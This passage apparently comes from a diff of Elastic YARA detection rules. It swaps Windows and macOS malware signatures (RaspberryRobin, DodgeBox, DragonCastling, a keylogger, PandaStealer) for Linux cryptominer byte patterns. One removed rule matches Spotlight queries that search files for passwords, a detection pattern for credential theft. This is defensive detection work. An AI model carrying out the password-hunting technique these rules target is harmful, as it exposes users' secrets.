"3ebc8cb6d647138e72194528dafc644c90222440855d657ec50109f11ff936da" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f6d32006747b083632f551c8ca182b6b4d67a8f130a118e61b0dd2f35d7d8477" - severity = 50 + fingerprint = "85cbe86b9f96fc1b6899b35cc4aa16b66a91dc1239ed5f5cf3609322cec30f30" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 8B 4D 08 33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8D 04 45 02 00 00 00 50 FF 75 0C 51 ?? ?? ?? ?? ?? 83 C4 0C 5D C3 CC CC 55 8B EC 6A 00 FF 75 08 } + $a = { 2C 1C 77 16 48 8B 44 24 08 64 48 33 04 25 28 00 00 00 75 24 48 83 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_C8424507 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_71024C4A : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "c8424507-34e1-4649-a4e4-3e0a0f62dfb0" - date = "2024-05-22" - modified = "2024-06-12" + id = "71024c4a-e8da-44fc-9cf9-c71829dfe87a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3404-L3423" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d556b02733385b823cfe4db7e562e90aa520e2e6fb00fceb76cc0a6a1ff47692" - logic_hash = "78d56257cb6e1d67f9343ee30b844fe20138e27ca3b6312a07112e5dbb797851" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L201-L219" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "afe81c84dcb693326ee207ccd8aeed6ed62603ad3c8d361e8d75035f6ce7c80f" + logic_hash = "0c66a3388fe8546ae180e52d50ef05a28755d24e47b3b56f390d5c6fcb0b89eb" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "8dfb14903b32c118492ae7e0aab9cf634c58ea93fcbc7759615209f61b3b3d6b" - severity = 50 + fingerprint = "dbbb74ec687e8e9293dfa2272d55b81ef863a50b0ff87daf15aaf6cee473efe6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 78 75 73 65 68 6F 62 69 6D 6F 7A 61 63 6F 67 6F 6A 69 68 6F 67 69 76 6F } - $a2 = { 62 65 6D 69 74 69 76 65 67 69 77 6F 6D 65 7A 75 76 65 62 61 67 } + $a = { 46 08 48 89 45 08 48 8B 46 10 48 85 C0 48 89 45 10 74 BC F0 FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_9Af87Ddb : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_D81368A3 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "9af87ddb-c3ed-44a5-b1a1-984b6f8a6065" - date = "2024-05-23" - modified = "2024-06-12" + id = "d81368a3-00ca-44cf-b009-718272d389eb" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3425-L3443" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b1fbc11744e21dc08599412887a3a966572614ce25ccd3c8c98f04bcbdda3898" - logic_hash = "99174c5740324d7704a5c6ae924254f9b5f241c97901dfdb771fc176a76e4a30" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L221-L239" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "71225e4702f2e0a0ecf79f7ec6c6a1efc95caf665fda93a646519f6f5744990b" + logic_hash = "0e30c9ebd8f2d3a489180f114daf91a3655ce9075ae25ea3d6ef5be472d7721a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1505b6299961c729077ffd90a4c7ed3180f55329952841fe7045056ea2919de8" - severity = 50 + fingerprint = "dd463df2c03389af3e7723fda684b0f42342817b3a76664d131cf03542837b8a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 0A 28 2C 00 00 06 11 06 17 D6 13 06 11 06 11 07 8E B7 32 98 06 17 D6 0A 20 E8 03 00 00 28 21 00 00 0A 7E 0F 00 00 04 3A 74 FF FF FF 2A 00 1B 30 04 00 96 00 00 00 1F 00 00 11 03 39 88 } + $a = { CB 49 C1 E3 04 49 01 FB 41 8B 13 39 D1 7F 3F 7C 06 4D 3B 43 08 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_D7B57912 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_97E9Cebe : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "d7b57912-02b4-421a-8f93-9e8371314e68" - date = "2024-05-23" - modified = "2024-06-12" + id = "97e9cebe-d30b-49f6-95f4-fd551e7a42e4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3445-L3463" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0906599be152dd598c7f540498c44cc38efe9ea976731da05137ee6520288fe4" - logic_hash = "a774e3030d81e29805a9784cfbbc0b69c4fedebe0daa25e403777e1f46f9094f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L241-L259" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b4ff62d92bd4d423379f26b37530776b3f4d927cc8a22bd9504ef6f457de4b7a" + logic_hash = "8aad31db2646fb9971b9af886e30f6c5a62a9c7de86cb9dc9e1341ac3b7762eb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "36a3fecc918cd891d9c779f7ff54019908ba190853739c8059adb84233643a1c" - severity = 50 + fingerprint = "61bef39d174d97897ac0820b624b1afbfe73206208db420ae40269967213ebed" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 83 C4 B8 53 56 8B DA 89 45 FC 8D 45 FC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 FF 30 64 89 20 8B C3 ?? ?? ?? ?? ?? 6A 00 6A 00 8D 45 F0 50 8B 45 FC } + $a = { 8B 04 25 28 00 00 00 48 89 44 24 58 31 C0 49 83 FF 3F 48 89 74 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_23D33B48 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_98Ff0F36 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "23d33b48-00f6-487f-a3e5-f41603fc982e" - date = "2024-06-05" - modified = "2024-06-12" + id = "98ff0f36-5faf-417a-9431-8a44e9f088f4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3465-L3483" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "acbc22df07888498ae6f52f5458e3fb8e0682e443a8c2bc97177a0320b4e2098" - logic_hash = "c9fb93bb74e4d45197d0da5b641860738a42a583b15cc098e86ea79bb8690bf7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L261-L279" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c14aaf05149bb38bbff041432bf9574dd38e851038638aeb121b464a1e60dcc" + logic_hash = "60f17855b08cfc51e497003cbb5ed25d9168fb29c57d8bfd7105b9b5e714e3a1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7a25301a1297337810240e8880febe525726c9b79a4a4bd81b1f856865097995" - severity = 50 + fingerprint = "b25420dfc32522a060dc8470315409280e3c03de0b347e92a5bc6c1a921af94a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 83 7A 14 10 8B C2 53 56 57 8B F1 72 02 8B 02 83 7E 14 10 72 02 8B 0E 8B 5A 10 8D 56 10 8B 3A 53 50 89 55 FC 8B D7 51 ?? ?? ?? ?? ?? 8B D0 83 C4 0C 83 FA FF 74 30 3B FA 72 33 8B C7 } + $a = { 45 A8 8B 00 89 C2 48 8B 45 C8 48 01 C2 8B 45 90 48 39 C2 7E 08 8B } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_4B0B73Ce : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_1512Cf40 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "4b0b73ce-960d-40ce-ae85-5cf38d949f45" - date = "2024-06-05" - modified = "2024-06-12" + id = "1512cf40-ae62-40cf-935d-589be4fe3d93" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3485-L3503" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "236fc00cd7c75f70904239935ab90f51b03ff347798f56cec1bdd73a286b24c1" - logic_hash = "d53923df612dd7fe0b1b2c94c1c5d747b08723df129089326ec27c5049769cef" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L281-L299" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc063a0e763894e86cdfcd2b1c73d588ae6ecb411c97df2a7a802cd85ee3f46d" + logic_hash = "0d43e6a4bd5036c2b6adb61f2d7b11e625c20e9a3d29242c7c34cfc7708561be" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "11c544f9f3a51ffcd361d6558754a64a8a38f3ce9385038880ab58c99769db88" - severity = 50 + fingerprint = "f9800996d2e6d9ea8641d51aedc554aa732ebff871f0f607bb3fe664914efd5a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 53 56 57 8B 7D 08 83 7F 18 00 C6 45 FF C9 74 54 ?? ?? ?? ?? ?? ?? 8D 9B 00 00 00 00 33 F6 83 7F 18 00 74 40 6A 0A FF D3 46 81 FE E8 03 00 00 7C ED 8B 07 8B 50 08 6A 01 8D 4D FF 51 } + $a = { C4 10 5B C3 E8 35 A7 F6 FF 0F 1F 44 00 00 53 48 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_1F2E969C : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_0D6005A1 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "1f2e969c-5d90-4bab-a06a-9cccb1946251" - date = "2024-06-05" - modified = "2024-06-12" + id = "0d6005a1-a481-4679-a214-f1e3ef8bf1d0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3505-L3523" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7def75df729ed66511fbe91eadf15bc69a03618e78c48e27c35497db2a6a97ae" - logic_hash = "7d984a902f9bf40c9b49da89aba9249f80b41b24ca1cdb6189f541b40ef41742" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L301-L319" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "230d46b39b036552e8ca6525a0d2f7faadbf4246cdb5e0ac9a8569584ef295d4" + logic_hash = "c3fd32e7582f0900b94fe3ba6b6bcdf238f78e2e343d70d5b0196a968a41cf26" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e7c872f2422fe54367900d69c9bb94d86db2bf001cbbe00ba6c801fb3d1e610e" - severity = 50 + fingerprint = "435040ec452d337c60435b07622d3a8af8e3b7e8eb6ec2791da6aae504cc2266" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 53 8B 5A 10 56 8B F1 57 6A 78 89 75 FC C7 46 10 00 00 00 00 C7 46 14 0F 00 00 00 53 89 75 FC C6 06 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 33 C0 89 7D FC 85 DB 7E 39 0F 1F 40 00 } + $a = { 79 73 00 6E 6F 5F 6D 6C 63 6B 00 77 61 72 6E 00 6E 65 76 65 } condition: all of them } -rule ELASTIC_Windows_Trojan_Raspberryrobin_4B4D6899 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_E1Ff020A : FILE MEMORY { meta: - description = "Detects Windows Trojan Raspberryrobin (Windows.Trojan.RaspberryRobin)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "4b4d6899-bcde-4c40-90c9-bbb621aa1ebf" - date = "2023-12-13" - modified = "2024-01-12" + id = "e1ff020a-446c-4537-8cc3-3bcc56ba5a99" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RaspberryRobin.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2f0451f38adb74cb96c857de455887b00c5038b68210294c7f52b0b5ff64cc1e" - logic_hash = "bbafad9509b367e811e86cb8f2f64d9c1d59f82b5cd58a7af43325bb7fa9d9c3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L321-L339" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b611898f1605751a3d518173b5b3d4864b4bb4d1f8d9064cc90ad836dd61812" + logic_hash = "be801989b9770f3b70217bd5f13795b5dd0b516209f631d900b6647e0afe8d98" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f74bd83ba1ede9b1dce070967aedc7f8df923c7393c69fcf7c4cfcf7988e0f24" + fingerprint = "363872fe6ef89a0f4c920b1db4ac480a6ae70e80211200b73a804b43377fff01" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 55 89 E5 83 EC 0C 8B 45 08 3D 01 00 10 00 89 45 FC 89 4D F8 73 0F 8B 45 FC 89 45 F4 8B 4D F4 64 8B 11 89 55 F8 8B 45 F8 83 C4 0C 5D C3 } + $a = { 0F B6 4F 3D 0B 5C 24 F4 41 C1 EB 10 44 0B 5C 24 } condition: all of them } -rule ELASTIC_Windows_Trojan_Dodgebox_095012D2 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_102D6F7C : FILE MEMORY { meta: - description = "Detects Windows Trojan Dodgebox (Windows.Trojan.DodgeBox)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "095012d2-2804-44f5-b4a1-f9d9c028daf1" - date = "2024-07-11" - modified = "2024-07-26" + id = "102d6f7c-0e77-4b23-9e84-756aba929d83" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DodgeBox.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c6a3a1ea84251aed908702a1f2a565496d583239c5f467f5dcd0cfc5bfb1a6db" - logic_hash = "f1fe9b05deaebaddd83dda0ad98602b49682f8ba767de8c0ffad761d344c5115" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L341-L359" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bd40c2fbf775e3c8cb4de4a1c7c02bc4bcfa5b459855b2e5f1a8ab40f2fb1f9e" + logic_hash = "52966eaaef5522e711dc89bd796b1e12019a8485ee789e8d5112d86f7e630170" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0797dbe75dea90df77d35d2d4a259b4402c041bc10f9e52df2ef80b2a5804c9f" + fingerprint = "037b1da31ffe66015c959af94d89eef2f7f846e1649e4415c31deaa81945aea9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 43 72 79 70 74 6F 67 72 61 70 68 79 00 4D 61 63 68 69 6E 65 47 75 69 64 00 2E 70 64 61 74 61 } - $a2 = { 5C 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 2E 00 4E 00 45 00 54 00 5C 00 61 00 73 00 73 00 65 00 6D 00 62 00 6C 00 79 00 5C 00 47 00 41 00 43 00 5F 00 4D 00 53 00 49 00 4C 00 5C 00 00 00 00 00 00 00 25 00 6C 00 6C 00 64 00 2E 00 6C 00 6F 00 67 } - $a3 = { 48 83 EC 20 48 63 51 3C 48 8B D9 33 F6 48 8D 3C 11 8B 8F 90 00 00 00 85 C9 74 21 8B 87 94 00 00 00 85 C0 74 17 44 8B C0 48 03 CB 33 D2 ?? ?? ?? ?? ?? 48 89 B7 90 00 00 00 8B 53 3C 48 63 FA } - $a4 = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 63 51 3C 48 8B D9 33 F6 48 8D 3C 11 8B 8F 90 00 } - $a5 = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 63 59 3C 33 D2 4C 8B C3 48 8B F1 E8 } + $a = { 70 D2 AA C5 F9 EF D2 C5 F1 EF CB C5 E1 73 FB 04 C4 E3 79 DF } condition: - any of them + all of them } -rule ELASTIC_Windows_Backdoor_Dragoncastling_4Ecf6F9F : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_9C8F3B1A : FILE MEMORY { meta: - description = "Detects Windows Backdoor Dragoncastling (Windows.Backdoor.DragonCastling)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "4ecf6f9f-a4c8-4962-9f16-cf7fb76467d3" - date = "2022-11-08" - modified = "2022-12-20" + id = "9c8f3b1a-0273-4164-ba48-b0bc090adf9e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Backdoor_DragonCastling.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9776c7ae6ca73f87d7c838257a5bcd946372fbb77ebed42eebdfb633b13cd387" - logic_hash = "26ff86354230f1006bd451eab5c1634b91888330d124a06dd2dfa5ab515d6e1a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L361-L379" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "74d8344139c5deea854d8f82970e06fc6a51a6bf845e763de603bde7b8aa80ac" + logic_hash = "f7ab9990b417c1c81903dcb7adaae910d20ea7fce6689d4846dd6002bea3e721" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "be22acb2c9c28b68d9fffe255f7d72065fb683ef2e3c4f73914f51e14ae43175" + fingerprint = "a35efe6bad4e0906032ab2fd7c776758e71caed8be402948f39682cf1f858005" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "recv bomb" ascii fullword - $a2 = "%s\\kbg%x.dat" - $a3 = "\\smcache.dat" wide fullword - $a4 = "%s\\game_%x.log" - $a5 = "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" - $a7 = "HOST: %ws:%ws" ascii fullword - $a8 = "; Windows NT %d.%d" wide fullword - $a9 = "Mozilla / 5.0 (Windows NT 6.3; WOW64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 41.0.2272.118 Safari / 537.36" ascii fullword - $a10 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\User Agent\\Post Platform" wide fullword + $a = { 6F 67 31 70 00 6C 6F 67 32 66 00 6C 6C 72 6F 75 6E 64 00 73 71 } condition: - 5 of them + all of them } -rule ELASTIC_Macos_Infostealer_Mdquerypassw_6125F987 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_76Cb94A9 : FILE MEMORY { meta: - description = "Detects Macos Infostealer Mdquerypassw (MacOS.Infostealer.MdQueryPassw)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "6125f987-b5a4-4999-ab39-ff312a43f6d9" - date = "2023-04-11" - modified = "2024-08-19" + id = "76cb94a9-5a3f-483c-91f3-aa0e3c27f7ba" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Infostealer_MdQueryPassw.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "72e0c1a7507733157f93e2bff82e6ec10d50986020eeeb27a02aba5cd8c78a81" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L381-L399" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1320d7a2b5e3b65fe974a95374b4ea7ed1a5aa27d76cd3d9517d3a271121103f" + logic_hash = "758ee41048c94576e7a872bfdacc6b6f2be3d460169905c876585037e11fdaa8" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "744e5e82bd90dc75031c2ce8208e9b8d10f062a57666f7e7be9428321f2929cc" + fingerprint = "623a33cc95af46b8f0d557c69f8bf72db7c57fe2018b7a911733be4ddd71f073" severity = 100 - arch_context = "x86, arm64" + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $string1 = /kMDItemTextContent\s{1,50}==\s{1,50}\S{1,50}passw/ ascii wide nocase - $string2 = /kMDItemDisplayName\s{1,50}==\s{1,50}\S{1,50}passw\S{1,50}/ ascii wide nocase + $a = { 8C 24 98 00 00 00 31 C9 80 7A 4A 00 48 89 74 24 18 48 89 54 } condition: - any of ($string1,$string2) + all of them } -rule ELASTIC_Macos_Trojan_Aobokeylogger_Bd960F34 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_616Afaa1 : FILE MEMORY { meta: - description = "Detects Macos Trojan Aobokeylogger (MacOS.Trojan.Aobokeylogger)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "bd960f34-1932-41be-ac0a-f45ada22c560" - date = "2021-10-18" - modified = "2021-10-25" + id = "616afaa1-7679-4198-9e80-c3f044b3c07d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Aobokeylogger.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2b50146c20621741642d039f1e3218ff68e5dbfde8bb9edaa0a560ca890f0970" - logic_hash = "f89fbf1d6bf041de0ce32f7920818c34ce0eeb6779bb7fac6f223bbea1c6f6fa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L401-L419" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0901672d2688660baa26fdaac05082c9e199c06337871d2ae40f369f5d575f71" + logic_hash = "53a309a6a274558e4ae8cfa8f3e258f23dc9ceafab3be46351c00d24f5d790ec" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "ae26a03d1973669cbeaabade8f3fd09ef2842b9617fa38e7b66dc4726b992a81" + fingerprint = "fd6afad9f318ce00b0f0f8be3a431a2c7b4395dd69f82328f4555b3715a8b298" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 20 74 68 61 6E 20 32 30 30 20 6B 65 79 73 74 72 6F 6B 65 73 20 } + $a = { 4B 04 31 C0 41 8B 14 07 89 14 01 48 83 C0 04 48 83 F8 14 75 EF 4C 8D 74 } condition: all of them } -rule ELASTIC_Windows_Trojan_Pandastealer_8B333E76 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_18Af74B2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Pandastealer (Windows.Trojan.Pandastealer)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "8b333e76-f723-4093-ad72-2f5d42aaa9c9" - date = "2021-09-02" - modified = "2022-01-13" + id = "18af74b2-99fe-42fc-aacd-7887116530a8" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Pandastealer.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935" - logic_hash = "5878799338fc18bac0f946faeadd59c921dee32c9391fc12d22c72c0cd6733a8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L421-L439" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "52707aa413c488693da32bf2705d4ac702af34faee3f605b207db55cdcc66318" + logic_hash = "d8ec9bd01fcabdd4a80e07287ecc85026007672bbc3cd2d4cbb2aef98da88ed5" score = 75 - quality = 25 + quality = 75 tags = "FILE, MEMORY" - 